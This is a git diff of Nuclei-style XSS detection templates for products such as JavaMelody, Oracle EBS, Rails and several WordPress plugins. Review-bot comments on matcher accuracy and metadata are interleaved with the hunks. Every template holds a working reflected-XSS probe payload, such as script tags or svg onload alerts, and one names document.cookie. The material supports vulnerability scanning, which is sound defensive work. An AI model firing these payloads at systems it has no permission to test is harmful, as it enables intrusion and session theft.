'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex + name: source + part: body + regex: + - 'location(\.href|\.hash|\.search|\.pathname)?' + - 'window\.name' + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' diff --git a/poc/xss/java-melody-xss-8225.yaml b/poc/xss/java-melody-xss-8225.yaml index 53c48c29ef..3899625c59 100644 --- a/poc/xss/java-melody-xss-8225.yaml +++ b/poc/xss/java-melody-xss-8225.yaml @@ -1,6 +1,7 @@ id: java-melody-xss + info: - name: JavaMelody Monitoring - Cross-Site Scripting + name: JavaMelody Monitoring XSS author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. 
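Review bot: Several alternatives in the new `sink` regexes of `dom-xss.yaml` do not match what they are meant to: `\..constructor` and `\.attr.onmousedown` contain an unescaped `.`, `\.wrapALL` does not match jQuery's `wrapAll`, and the standalone `'fetch(\.body)?'` entry repeats an alternative already in the `eval|Function|…` pattern. That pattern is also unanchored, so `eval` and `Function` match inside longer identifiers; wrapping it as `\b(?:eval|Function|…)\b` would cut the noise in extractor output. This file and `dom-xss-7080.yaml` both keep `id: dom-xss`, so results from the two cannot be told apart by id.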
@@ -8,19 +9,23 @@ info: - https://github.com/Hurdano/JavaMelody-XSS - https://github.com/javamelody/javamelody/pull/555 tags: xss,javamelody + requests: - method: GET path: - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '</script><script>alert(document.domain)</script>' + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/xss/microweber-xss-8865.yaml b/poc/xss/microweber-xss-8865.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/xss/microweber-xss-8865.yaml +++ b/poc/xss/microweber-xss-8865.yaml @@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/xss/mida-eframework-xss.yaml b/poc/xss/mida-eframework-xss.yaml index 743d669bdd..3516f07456 100644 --- a/poc/xss/mida-eframework-xss.yaml +++ b/poc/xss/mida-eframework-xss.yaml 
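Review bot: The added `cve-id:` key under `classification` in `microweber-xss-8865.yaml` has no value, so it loads as null rather than as a string. Drop the line until a CVE id is actually assigned, since a schema check or report field that expects a string could reject or mis-render it. The `metadata` move and the added quotes around `description` and `shodan-query` are cosmetic.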
@@ -1,22 +1,18 @@ id: mida-eframework-xss - info: name: Mida eFramework - Cross Site Scripting author: pikpikcu severity: medium tags: mida,xss - requests: - raw: - | POST /MUP/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/MUP UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E - matchers-condition: and matchers: - type: status @@ -24,4 +20,4 @@ requests: - 200 - type: word words: - - '"><script>javascript:alert(document.cookie)</script>' \ No newline at end of file + - '"><script>javascript:alert(document.cookie)</script>' diff --git a/poc/xss/moodle-filter-jmol-xss-8944.yaml b/poc/xss/moodle-filter-jmol-xss-8944.yaml index 3de97cd97f..e5153a78ec 100644 --- a/poc/xss/moodle-filter-jmol-xss-8944.yaml +++ b/poc/xss/moodle-filter-jmol-xss-8944.yaml @@ -1,20 +1,30 @@ id: moodle-filter-jmol-xss + info: name: Moodle filter_jmol - XSS author: madrobot severity: medium description: Cross-site scripting on Moodle. + reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss + requests: - method: GET path: - - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" + - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - '\"};alert(1337);//' + - "<script>alert('XSS')</script>" part: body + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/poc/xss/nginx-module-vts-xss-9108.yaml b/poc/xss/nginx-module-vts-xss-9108.yaml index 61c9ee43e6..4057382928 100644 --- a/poc/xss/nginx-module-vts-xss-9108.yaml +++ b/poc/xss/nginx-module-vts-xss-9108.yaml 
@@ -1,41 +1,18 @@ id: nginx-module-vts-xss - info: - name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting - author: madrobot,j4vaovo - severity: high - description: Nginx Virtual Host Traffic Status Module contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/vozlt/nginx-module-vts - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 2 - tags: nginx,xss,status - -http: - - raw: - - | - GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - + name: Nginx virtual host traffic status module XSS + author: madrobot + severity: medium +requests: + - method: GET + path: + - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_2 == 200" - - "contains(header_2, 'text/html')" - - "contains(tolower(body_2), '<script>alert(7331)</script>')" - condition: and - - - type: dsl - dsl: - - "!contains(tolower(body_1), '<script>alert(1337)</script>')" - condition: and - -# digest: 4a0a00473045022100bef45d36680d708495ed8789f663d812bf77ddc8302ba5453b03064d854396940220096f5be895895b9b295c6e4a0a68259b2606c6b857da24f5b78ecfe880647b7f:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 + - type: word + words: + - "<script>alert(31337)</script>" + part: body diff --git a/poc/xss/oracle-ebs-xss-9375.yaml b/poc/xss/oracle-ebs-xss-9375.yaml index 8c5ff6abb9..b684437823 100644 --- a/poc/xss/oracle-ebs-xss-9375.yaml +++ b/poc/xss/oracle-ebs-xss-9375.yaml 
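Review bot: The rewritten matchers in `nginx-module-vts-xss-9108.yaml` accept any 200 response whose body contains `<script>alert(31337)</script>`. Both the `contains(header_2, 'text/html')` condition and the control request that ruled out a generic reflecting error page are gone, so JSON or plain-text echoes of the path would be reported as XSS. Add a `word` matcher on `part: header` for `text/html` beside the two matchers here, as `sick-beard-xss-10234.yaml` does in this patch. The new `info` block also has no `tags` or `description`.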
@@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS - Cross-Site Scripting + name: Oracle EBS XSS author: dhiyaneshDk severity: medium + tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "<svg/onload=alert('{{randstr}}')>" part: body + - type: status status: - 200 diff --git a/poc/xss/oracle-siebel-xss.yaml b/poc/xss/oracle-siebel-xss.yaml index 2de4a62dca..8185fb2460 100644 --- a/poc/xss/oracle-siebel-xss.yaml +++ b/poc/xss/oracle-siebel-xss.yaml 
@@ -1,19 +1,11 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting + name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK - severity: high - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: - - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - - https://exploit-db.com/exploits/47762 - - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel + severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + tags: xss,oracle requests: - method: GET path: @@ -30,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/xss/php-timeclock-xss-9553.yaml b/poc/xss/php-timeclock-xss-9553.yaml index 4b06f97417..55686517b4 100644 --- a/poc/xss/php-timeclock-xss-9553.yaml +++ b/poc/xss/php-timeclock-xss-9553.yaml 
@@ -1,16 +1,18 @@ id: php-timeclock-xss + info: name: PHP Timeclock 1.04 XSS author: pikpikcu severity: medium description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities - reference: - - https://www.exploit-db.com/exploits/49853 + reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock + requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" + matchers-condition: and matchers: - type: status @@ -22,6 +24,7 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and + - type: word words: - "text/html" diff --git a/poc/xss/qcubed-xss.yaml b/poc/xss/qcubed-xss.yaml index cae77f9cf8..c3cee1042e 100644 --- a/poc/xss/qcubed-xss.yaml +++ b/poc/xss/qcubed-xss.yaml @@ -1,29 +1,26 @@ id: qcubed-xss - info: name: Qcubed Reflected XSS author: pikpikcu severity: medium + description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. reference: https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed - requests: - method: GET path: - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '</script><script>alert(document.domain)</script>' part: body - - type: status status: - 200 - - type: word part: header words: diff --git a/poc/xss/rails6-xss-9800.yaml b/poc/xss/rails6-xss-9800.yaml index 184c779cfa..7991dd37b2 100644 --- a/poc/xss/rails6-xss-9800.yaml +++ b/poc/xss/rails6-xss-9800.yaml 
@@ -1,20 +1,22 @@ id: rails6-xss -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); -# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf + + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" + matchers-condition: and matchers: - type: word diff --git a/poc/xss/rockmongo-xss.yaml b/poc/xss/rockmongo-xss.yaml index d23d822656..e7d666e455 100644 --- a/poc/xss/rockmongo-xss.yaml +++ b/poc/xss/rockmongo-xss.yaml @@ -1,12 +1,12 @@ id: rockmongo-xss - info: name: RockMongo V1.1.8 XSS author: pikpikcu severity: medium - reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html + description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. + reference: + - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss - requests: - method: POST path: 
@@ -14,20 +14,16 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3" - matchers-condition: and matchers: - - type: word words: - '"><script>alert(document.domain)</script>' part: body - - type: status status: - 200 - - type: word words: - 'Content-Type: text/html' - part: header \ No newline at end of file + part: header diff --git a/poc/xss/sick-beard-xss-10234.yaml b/poc/xss/sick-beard-xss-10234.yaml index 7c77563074..077ac871aa 100644 --- a/poc/xss/sick-beard-xss-10234.yaml +++ b/poc/xss/sick-beard-xss-10234.yaml @@ -1,14 +1,14 @@ id: sick-beard-xss - -# Vendor Homepage: https://sickbeard.com/ -# Software Link: https://github.com/midgetspy/Sick-Beard -# shodan dork: sickbeard - info: name: Sick Beard XSS author: pikpikcu severity: medium - + reference: + - https://sickbeard.com/ # vendor homepage + - https://github.com/midgetspy/Sick-Beard # software link + metadata: + shodan-query: sickbeard + tags: xss requests: - method: GET path: @@ -21,4 +21,8 @@ requests: - type: word words: - <svg/onload=alert(document.domain)> - part: body \ No newline at end of file + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/xss/sick-beard-xss.yaml b/poc/xss/sick-beard-xss.yaml index 9ff750dba9..99281db45d 100644 --- a/poc/xss/sick-beard-xss.yaml +++ b/poc/xss/sick-beard-xss.yaml @@ -1,14 +1,15 @@ id: sick-beard-xss + info: name: Sick Beard XSS author: pikpikcu severity: medium tags: xss - reference: - - https://sickbeard.com/ # vendor homepage - - https://github.com/midgetspy/Sick-Beard # software link - metadata: - shodan-query: sickbeard + +# Vendor Homepage: https://sickbeard.com/ +# Software Link: https://github.com/midgetspy/Sick-Beard +# shodan dork: sickbeard + requests: - method: GET path: 
@@ -25,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header + part: header \ No newline at end of file diff --git a/poc/xss/tikiwiki-reflected-xss.yaml b/poc/xss/tikiwiki-reflected-xss.yaml index 1fb2ed3601..6283ecd6fd 100644 --- a/poc/xss/tikiwiki-reflected-xss.yaml +++ b/poc/xss/tikiwiki-reflected-xss.yaml @@ -1,14 +1,17 @@ id: tikiwiki-reflected-xss + info: name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting author: madrobot severity: medium - tags: xss + tags: xss,tikiwiki + requests: - method: GET path: - "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" - "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" + matchers-condition: and matchers: - type: status diff --git a/poc/xss/turbocrm-xss-10851.yaml b/poc/xss/turbocrm-xss-10851.yaml index 3967f32aff..8b56f76f93 100644 --- a/poc/xss/turbocrm-xss-10851.yaml +++ b/poc/xss/turbocrm-xss-10851.yaml 
@@ -1,26 +1,40 @@ id: turbocrm-xss + info: - name: TurboCRM XSS + name: TurboCRM - Cross-Site Scripting author: pikpikcu - severity: medium - description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. + severity: high + description: TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application. reference: - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: xss,turbocrm -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + matchers-condition: and matchers: + - type: word words: - '"><script>alert(document.domain)</script>' part: body + - type: word part: header words: - "text/html" + - type: status status: - 200 + +# Enhanced by mp on 2022/09/23 diff --git a/poc/xss/wems-manager-xss.yaml b/poc/xss/wems-manager-xss.yaml index b3f7b4ace4..e3e8a064f3 100644 --- a/poc/xss/wems-manager-xss.yaml +++ b/poc/xss/wems-manager-xss.yaml @@ -1,14 +1,11 @@ id: wems-manager-xss - info: name: WEMS Enterprise Manager XSS author: pikpikcu severity: medium tags: xss - reference: | - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - requests: - method: GET path: @@ -25,4 +22,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml 
@@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/xss/wordpress-wordfence-xss-11362.yaml b/poc/xss/wordpress-wordfence-xss-11362.yaml index 5e9faea1da..5bae09492e 100644 --- a/poc/xss/wordpress-wordfence-xss-11362.yaml +++ b/poc/xss/wordpress-wordfence-xss-11362.yaml @@ -1,37 +1,23 @@ id: wordpress-wordfence-xss - info: - name: WordPress Wordfence 7.4.6 - Cross0Site Scripting + name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 tags: wordpress,wp-plugin,xss,wordfence - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" - matchers-condition: and matchers: - type: word words: - "'>\"<svg/onload=confirm('test')>" part: body - - type: word words: - "text/html" part: header - - type: status status: - 200 - -# digest: 4b0a00483046022100815f67bcdfe2984d98c0813beb5910e2cc89f870bb3bbd77541709c3b946b81d022100a2dbf03c4062d763655eb094266a2faa921751d5b6a85ddc160e4731ee1731a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/xss/wordpress-zebra-form-xss-11379.yaml b/poc/xss/wordpress-zebra-form-xss-11379.yaml index a36ec88196..bd81293cdb 100644 --- a/poc/xss/wordpress-zebra-form-xss-11379.yaml +++ b/poc/xss/wordpress-zebra-form-xss-11379.yaml 
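Review bot: The new side of `wordpress-wordfence-xss-11362.yaml` looks like an older revision written over a newer one. It drops `description`, `classification` and `metadata`, switches `http:` back to `requests:` (the turbocrm template in this same commit moves the other way), and removes the trailing `# digest:` line. Without the classification a hit carries no CVSS or CWE data for triage. The digest appears to be the template's signature, so without it a consumer of this corpus has no way to tell this copy from a modified one. I would keep `http:` and the `classification` block, and have the file re-signed after the edit rather than shipping it unsigned.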
@@ -1,27 +1,22 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss requests: - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/poc/xss/wp-adaptive-xss.yaml b/poc/xss/wp-adaptive-xss.yaml index f297df178f..0a6168d053 100644 --- a/poc/xss/wp-adaptive-xss.yaml +++ b/poc/xss/wp-adaptive-xss.yaml @@ -1,4 +1,5 @@ id: wp-adaptive-xss + info: name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting author: dhiyaneshDK 
@@ -8,10 +9,12 @@ info: - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - https://plugins.trac.wordpress.org/changeset/2655683 tags: wordpress,xss,wp-plugin,wp + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" + matchers-condition: and matchers: - type: word @@ -19,10 +22,12 @@ requests: - '<img/src/onerror=alert(document.domain)>' - '<td>Image</td>' condition: and + - type: word part: header words: - 'text/html' + - type: status status: - 200 diff --git a/poc/xss/wp-church-admin-xss-11424.yaml b/poc/xss/wp-church-admin-xss-11424.yaml index 089b607075..6dfb09ebcb 100644 --- a/poc/xss/wp-church-admin-xss-11424.yaml +++ b/poc/xss/wp-church-admin-xss-11424.yaml @@ -1,29 +1,25 @@ id: wp-church-admin-xss - info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-code-snippets-xss.yaml b/poc/xss/wp-code-snippets-xss.yaml index d6d4c61340..b3552bcadb 100644 --- a/poc/xss/wp-code-snippets-xss.yaml +++ b/poc/xss/wp-code-snippets-xss.yaml 
@@ -1,11 +1,10 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - XSS author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - reference: - - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -27,9 +26,6 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' - - 'toplevel_page_snippets' - - 'Search results in tag' - condition: and - type: word part: header words: diff --git a/poc/xss/wp-flagem-xss.yaml b/poc/xss/wp-flagem-xss.yaml index 98183da5f2..bc74462f47 100644 --- a/poc/xss/wp-flagem-xss.yaml +++ b/poc/xss/wp-flagem-xss.yaml @@ -1,30 +1,24 @@ id: wp-flagem-xss - info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.exploit-db.com/exploits/38674 + reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-nextgen-xss.yaml b/poc/xss/wp-nextgen-xss.yaml index 26930307d2..b8c4c9254f 100644 --- a/poc/xss/wp-nextgen-xss.yaml +++ b/poc/xss/wp-nextgen-xss.yaml 
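Review bot: The first hunk of `wp-code-snippets-xss.yaml` turns `reference` from a list into a bare scalar, while other files in this commit (`wordpress-zebra-form-xss-11379.yaml`, `wp-church-admin-xss-11424.yaml`) are converted from scalar to list. The same list-to-scalar change appears in `wp-flagem-xss.yaml` and `wp-nextgen-xss.yaml`. Keeping one shape across the corpus makes the field easier to parse and to lint; I would keep the list form, `reference:` followed by `- https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/`.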
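Review bot: In the `@@ -27,9 +26,6 @@` hunk of `wp-code-snippets-xss.yaml`, removing `'toplevel_page_snippets'`, `'Search results in tag'` and `condition: and` leaves the echoed string as the only body evidence. Any authenticated page that reflects the parameter would then be reported as this plugin's issue, which raises the false-positive rate. Those two words tied the match to the plugin's admin page, so I would keep them together with `condition: and`. The matcher list starts and ends outside the hunk, so the header and status checks are only partly visible here.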
@@ -1,30 +1,24 @@ id: wp-nextgen-xss - info: name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + reference: https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-phpfreechat-xss.yaml b/poc/xss/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/xss/wp-phpfreechat-xss.yaml +++ b/poc/xss/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-slideshow-xss.yaml b/poc/xss/wp-slideshow-xss.yaml index 49be6efa96..2b851c9f5b 100644 --- a/poc/xss/wp-slideshow-xss.yaml +++ b/poc/xss/wp-slideshow-xss.yaml @@ -1,5 +1,4 @@ id: wp-slideshow-xss - info: name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) author: daffainfo 
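Review bot: The `reference` in `wp-nextgen-xss.yaml` now points at the live `https://www.securityfocus.com/bid/57200/info` instead of the `web.archive.org` snapshot it replaces. The snapshot was presumably chosen because the original page is no longer served, and `wp-phpfreechat-xss.yaml` in this same commit still keeps its archived link. A dead reference leaves whoever triages a hit with no advisory to confirm affected versions against. I would keep `- http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info` in list form.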
